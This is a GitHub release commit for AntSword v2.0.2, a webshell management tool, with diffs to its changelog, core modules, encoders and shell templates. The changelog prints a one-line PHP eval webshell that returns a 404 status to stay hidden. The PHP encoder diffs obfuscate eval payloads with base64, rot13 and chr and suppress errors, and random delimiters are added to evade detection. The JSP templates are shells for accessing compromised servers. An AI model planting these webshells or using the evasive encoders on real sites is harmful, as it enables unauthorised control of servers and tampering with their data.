Release v2.0.2

Merge pull request #104 from AntSwordProject/v2.0.x
AntSwordProject · Dec 5, 2018 · a94c3c4 · a94c3c4
2 parents 4a6d93e + 71894bf
commit a94c3c4
Show file tree

Hide file tree

Showing 27 changed files with 1,353 additions and 76 deletions.
diff --git a/CHANGELOG.md b/CHANGELOG.md
@@ -2,6 +2,50 @@
 > 有空会补补BUG、添添新功能。    
 > 同时也欢迎大家的参与！感谢各位朋友的支持！ .TAT.
 
+## 2018/12/05 `(v2.0.2)`
+
+### 模块增强
+
+#### Shell 管理
+
+ * 可在 Shell 编辑数据窗口下的`其它设置`栏目下自定义上传文件分片大小 (默认为 500KB, 太大会导致 HTTP 413 错误)
+
+#### 文件管理
+
+ * PHP Shell 下可直接修改文件权限, 显示为4位 8进制数, 如 `0644`
+
+#### 数据管理
+
+ * 优化了查询结果显示，默认所有列宽为 100
+ * 可将查询结果导出为 CSV 文件
+ * PHP Shell MySQL 数据库可视化增强，支持`新建数据库`,`删除数据库`,`新建表`,`修改表名`,`删除表`,`编辑列名`,`删除列`
+
+#### 虚拟终端
+
+ * 虚拟终端界面下使用 `Ctrl` + `=`(和`+`在一起的那个键) 可放大, `Ctrl` + `-` 可缩小
+
+#### 浏览网站
+
+ * 新增了地址栏, 面对需要先进入登录页面的 Shell, 可先在此处访问 login 页面，然后保存 Cookie 到 Shell 配置。 默认为 Shell 的 URL
+ * 调整了工具栏按钮的排列
+ * 关闭了默认自动打开 URL,需要手动点击「浏览」按钮
+
+### Bug Fix
+
+ * 修正 windows 客户端下用户编码器路径解析错误的问题
+
+### Other
+
+ * 数据分割符随机化，再也不是之前固定的 `->|` 和 `|<-` 了
+ * 支持返回状态为 404, 500, 403 等非 200 的 Shell (#103 thx @Curz0n)，一个简单的例子如下：
+
+  ```
+    <?php http_response_code(404);@eval($_POST['ant']);?>
+  ```
+
+ * JSP Shell 基础信息调整, 现在默认的目录为 shell 编译后的 class 文件所在目录
+ * 关于页面新增 [Discord 在线交流地址](https://discord.gg/Uzh5nUf)
+
 ## 2018/09/12 `(v2.0.1)`
 
 ### 插件

diff --git a/README.md b/README.md
@@ -1,4 +1,4 @@
-# AntSword [![release](https://img.shields.io/badge/release-v2.0.0-blue.svg?style=flat-square)][url-release]
+# AntSword [![release](https://img.shields.io/badge/release-v2.0.2-blue.svg?style=flat-square)][url-release]
 
 > AntSword in your hands, no worries in your mind！
 

diff --git a/README_CN.md b/README_CN.md
@@ -1,4 +1,4 @@
-# 中国蚁剑 [![release](https://img.shields.io/badge/release-v2.0.0-blue.svg?style=flat-square)][url-release]
+# 中国蚁剑 [![release](https://img.shields.io/badge/release-v2.0.2-blue.svg?style=flat-square)][url-release]
 
 > 一剑在手，纵横无忧！
 

diff --git a/modules/request.js b/modules/request.js
@@ -122,7 +122,11 @@ class Request {
         }, res, callback);
       })
       .end((err, ret) => {
-        let buff = ret.body;
+        if (!ret) {
+          // 请求失败 TIMEOUT
+          return event.sender.send('request-error-' + opts['hash'], err);
+        }
+        let buff = ret.hasOwnProperty('body') ? ret.body : new Buffer();
         // 解码
         let text = iconv.decode(buff, opts['encode']);
         if (err && text == "") {

diff --git a/package.json b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "antsword",
-  "version": "2.0.1",
+  "version": "2.0.2",
   "description": "中国蚁剑是一款跨平台的开源网站管理工具",
   "main": "app.js",
   "dependencies": {

diff --git a/shells/jsp_custom_script_for_mysql.jsp b/shells/jsp_custom_script_for_mysql.jsp
@@ -111,8 +111,7 @@ ChangeLog:
         return ret;
     }
 
-    String WwwRootPathCode(HttpServletRequest r) throws Exception {
-        String d = this.getClass().getResource("/").getPath();
+    String WwwRootPathCode(String d) throws Exception {
         String s = "";
         if (!d.substring(0, 1).equals("/")) {
             File[] roots = File.listRoots();
@@ -286,7 +285,7 @@ ChangeLog:
         String serverInfo = (String)System.getProperty("os.name");
         String separator = File.separator;
         String user = (String)System.getProperty("user.name");
-        String driverlist = WwwRootPathCode(r);
+        String driverlist = WwwRootPathCode(d);
         return d + "\t" + driverlist + "\t" + serverInfo + "\t" + user;
     }
 

diff --git a/shells/jspx_custom_script_for_mysql.jspx b/shells/jspx_custom_script_for_mysql.jspx
@@ -103,8 +103,7 @@ Ver:1.3
             return ret;
         }
 
-        String WwwRootPathCode(HttpServletRequest r) throws Exception {
-            String d = this.getClass().getResource("/").getPath();
+        String WwwRootPathCode(String d) throws Exception {
             String s = "";
             if (!d.substring(0, 1).equals("/")) {
                 File[] roots = File.listRoots();
@@ -278,7 +277,7 @@ Ver:1.3
             String serverInfo = (String)System.getProperty("os.name");
             String separator = File.separator;
             String user = (String)System.getProperty("user.name");
-            String driverlist = WwwRootPathCode(r);
+            String driverlist = WwwRootPathCode(d);
             return d + "\t" + driverlist + "\t" + serverInfo + "\t" + user;
         }
 

diff --git a/source/core/asp/index.js b/source/core/asp/index.js
@@ -44,8 +44,8 @@ class ASP extends Base {
    */
   complete(data) {
     // 分隔符号
-    let tag_s = '->|';
-    let tag_e = '|<-';
+    let tag_s = Math.random().toString(16).substr(2, 5); // '->|';
+    let tag_e = Math.random().toString(16).substr(2, 5); // '|<-';
 
     // let formatter = new this.format(this.__opts__['encode']);
     let formatter = Base.prototype.format(this.__opts__['encode']);

diff --git a/source/core/aspx/index.js b/source/core/aspx/index.js
@@ -47,8 +47,8 @@ class ASPX extends Base {
    */
   complete(data) {
     // 分隔符号
-    let tag_s = '->|';
-    let tag_e = '|<-';
+    let tag_s = Math.random().toString(16).substr(2, 5); // '->|';
+    let tag_e = Math.random().toString(16).substr(2, 5); // '|<-';
 
     // let formatter = new this.format(this.__opts__['encode']);
     let formatter = Base.prototype.format(this.__opts__['encode']);

diff --git a/source/core/custom/template/filemanager.js b/source/core/custom/template/filemanager.js
@@ -38,7 +38,7 @@ module.exports = () => ({
   upload_file: {
     _: 'U',
     'z1': '#{path}',
-    'z2': '#{hex::content}'
+    'z2': '#{buffer::content}'
   },
 
   rename: {

diff --git a/source/core/php/encoder/base64.js b/source/core/php/encoder/base64.js
@@ -9,7 +9,7 @@ module.exports = (pwd, data) => {
   // 生成一个随机变量名
   let randomID = `_0x${Math.random().toString(16).substr(2)}`;
   data[randomID] = new Buffer(data['_']).toString('base64');
-  data[pwd] = `eval(base64_decode($_POST[${randomID}]));`;
+  data[pwd] = `@eval(@base64_decode($_POST[${randomID}]));`;
   delete data['_'];
   return data;
 }
diff --git a/source/core/php/encoder/chr.js b/source/core/php/encoder/chr.js
@@ -14,7 +14,7 @@ module.exports = (pwd, data) => {
       ret.push(php[i].charCodeAt());
       i ++;
     }
-    return `eVAl(cHr(${ret.join(').ChR(')}));`;
+    return `@eVAl(cHr(${ret.join(').ChR(')}));`;
   }
 
   // 编码并去除多余数据

diff --git a/source/core/php/encoder/chr16.js b/source/core/php/encoder/chr16.js
@@ -14,7 +14,7 @@ module.exports = (pwd, data) => {
       ret.push(php[i].charCodeAt().toString(16));
       i ++;
     }
-    return `eVAl(cHr(0x${ret.join(').ChR(0x')}));`;
+    return `@eVAl(cHr(0x${ret.join(').ChR(0x')}));`;
   }
 
   // 编码并去除多余数据

diff --git a/source/core/php/encoder/rot13.js b/source/core/php/encoder/rot13.js
@@ -19,7 +19,7 @@ module.exports = (pwd, data) => {
   // 生成一个随机变量名
   let randomID = `_0x${Math.random().toString(16).substr(2)}`;
   data[randomID] = encode(data['_']);
-  data[pwd] = `eval(str_rot13($_POST[${randomID}]));`;
+  data[pwd] = `@eval(@str_rot13($_POST[${randomID}]));`;
   delete data['_'];
   return data;
 }
diff --git a/source/core/php/index.js b/source/core/php/index.js
@@ -45,8 +45,9 @@ class PHP extends Base {
    */
   complete(data) {
     // 分隔符号
-    let tag_s = "->|";
-    let tag_e = "|<-";
+
+    let tag_s = Math.random().toString(16).substr(2, 5); // "->|";
+    let tag_e = Math.random().toString(16).substr(2, 5); // "|<-";
 
     // 组合完整的代码
     let tmpCode = data['_'];

diff --git a/source/core/php/template/filemanager.js b/source/core/php/template/filemanager.js
@@ -62,6 +62,13 @@ module.exports = (arg1, arg2, arg3) => ({
     [arg2]: "#{base64::time}"
   },
 
+  chmod: {
+    _:
+    `$m=get_magic_quotes_gpc();$FN=base64_decode(m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);$mode=base64_decode(m?stripslashes($_POST["${arg2}"]):$_POST["${arg2}"]);echo(chmod($FN,octdec($mode))?"1":"0");`,
+    [arg1]: "#{base64::path}",
+    [arg2]: "#{base64::mode}"
+  },
+
   mkdir: {
     _:
       `$m=get_magic_quotes_gpc();$f=base64_decode($m?stripslashes($_POST["${arg1}"]):$_POST["${arg1}"]);echo(mkdir($f)?"1":"0");`,

diff --git a/source/language/en.js b/source/language/en.js
@@ -170,6 +170,7 @@ module.exports = {
         nohttps: 'Ignore HTTPS certificate',
         terminalCache: "Use the terminal's cache",
         filemanagerCache: "Use the filemanager's cache",
+        uploadFragment: "Upload File Fragmentation Size",
         requestTimeout: 'Request timeout',
         commandPath: 'Custom terminal-execPath'
       }
@@ -219,6 +220,12 @@ module.exports = {
       success: (path) => antSword.noxss(`Retime file success!\n${path}`),
       error: (path, err) => antSword.noxss(`Retime file [${path}] failed!${err ? '\n' + err : ''}`)
     },
+    chmod: {
+      title: 'Chmod File',
+      check: 'Input should be octal numbers, eg: 0644',
+      success: (path) => antSword.noxss(`Chmod file success!\n${path}`),
+      error: (path, err) => antSword.noxss(`Chmod file [${path}] failed!${err ? '\n' + err : ''}`)
+    },
     wget: {
       title: 'Wget File',
       check: 'URL is not correct!',
@@ -234,6 +241,9 @@ module.exports = {
       task: {
         name: 'Upload',
         success: 'Upload success!',
+        httperr_413: 'Please lower the upload file shard size setting.',
+        httperr_etime: 'Request timeout, please increase the timeout period.',
+        httperr_econnrefused: 'Connection refused, check target or proxy is enabled.',
         failed: (err) => antSword.noxss(`Failed:${err}`),
         error: (err) => antSword.noxss(`Error:${err}`)
       },
@@ -303,6 +313,7 @@ module.exports = {
           upload: 'Upload',
           download: 'Download',
           modify: 'Modify the file time',
+          chmod: 'Chmod',
           copy: {
             title: 'Copy',
             warning: (id) => antSword.noxss(`Already add to clipboard!\n${id}`),
@@ -362,7 +373,18 @@ module.exports = {
       menu: {
         add: 'Add conf',
         del: 'Del conf',
-        edit: 'Edit conf'
+        edit: 'Edit conf',
+        adddb: 'New Database',
+        editdb: 'Edit Database',
+        deldb: 'Del Database',
+        addtable: 'New Table',
+        edittable: 'Edit TableName',
+        desctable: 'Desc Table',
+        showcreatetable: 'Create Table SQL',
+        deltable: 'Del Table',
+        addcolumn: 'New Column',
+        editcolumn: 'Edit ColumnName',
+        delcolumn: 'Del Column',
       }
     },
     query: {
@@ -380,8 +402,13 @@ module.exports = {
         query: (err) => antSword.noxss(`Failure to execute SQL!\n${err}`),
         parse: 'Return data format is incorrect!',
         noresult: 'No query results!'
+      },
+      dump: {
+        title: "Export Data",
+        success: "Export success",
       }
     },
+    notsupport: 'Not support the current database type',
     form: {
       title: 'Add conf',
       toolbar: {
@@ -402,6 +429,74 @@ module.exports = {
         confirm: 'Determine delete this configuration?',
         success: 'Delete configuration success!',
         error: (err) => antSword.noxss(`Delete configuration failed!\n${err}`)
+      },
+      adddb: {
+        title: 'New Database',
+        dbname: 'Name',
+        characterset: 'Character Set',
+        charactercollation: 'Collation',
+        createbtn: 'OK',
+        cancelbtn: 'Cancel',
+        success: 'Create database successfully',
+        error: 'Failed to create database',
+      },
+      editdb: {
+        title: 'Database Properties',
+        dbname: 'Name(readonly)',
+        characterset: 'Character Set',
+        charactercollation: 'Collation',
+        updatebtn: 'OK',
+        cancelbtn: 'Cancel',
+        success: 'Edit database successfully',
+        error: 'Failed to edit database',
+      },
+      deldb: {
+        title: 'Delete Database',
+        confirm: (name) => antSword.noxss(`Are you sure you want to delete database ${name} ?`),
+        success: 'Delete database successfully',
+        error: 'Failed to delete database',
+      },
+      addtable: {
+        title: 'New Table',
+        add: 'New Column',
+        delete: 'Delete Column',
+        save: 'Save',
+        gridheader: "Name,Type,Length,Not Null,Key,Auto Increment",
+        delete_not_select: "Please select the row you want to delete first",
+        save_row_is_null: "The number of rows is empty",
+        cell_valid_error: (i,j)=>`Data format validation failed(row ${i+1}, col ${j+1})`,
+        confirmtitle: "New table name",
+        invalid_tablename: "Table names should not contain special symbols",
+        success: 'Create table successfully',
+        error: 'Failed to create table',
+      },
+      edittable: {
+        title: "New table name",
+        invalid_tablename: "Table names should not contain special symbols",
+        success: 'Update table name successfully',
+        error: 'Failed to update table',
+      },
+      deltable: {
+        title:'Delete Table',
+        confirm: (name) => antSword.noxss(`Are you sure you want to delete table ${name}?`),
+        success: 'Delete table successfully',
+        error: 'Failed to delete table',
+      },
+      addcolumn: {
+
+      },
+      editcolumn: {
+        title: "New column name",
+        invalid_tablename: "Column names should not contain special symbols",
+        get_column_type_error: "Get column type error",
+        success: 'Update column name successfully',
+        error: 'Failed to update column',
+      },
+      delcolumn: {
+        title:'Delete Column',
+        confirm: (name) => antSword.noxss(`Are you sure you want to delete column ${name}?`),
+        success: 'Delete column successfully',
+        error: 'Failed to delete column',
       }
     }
   },
@@ -411,7 +506,8 @@ module.exports = {
       header: 'AntSword',
       homepage: 'Home',
       document: 'Document',
-      qqgroup: 'QQ Group'
+      qqgroup: 'QQ Group',
+      discord: 'Discord'
     },
     language: {
       title: 'Language setting',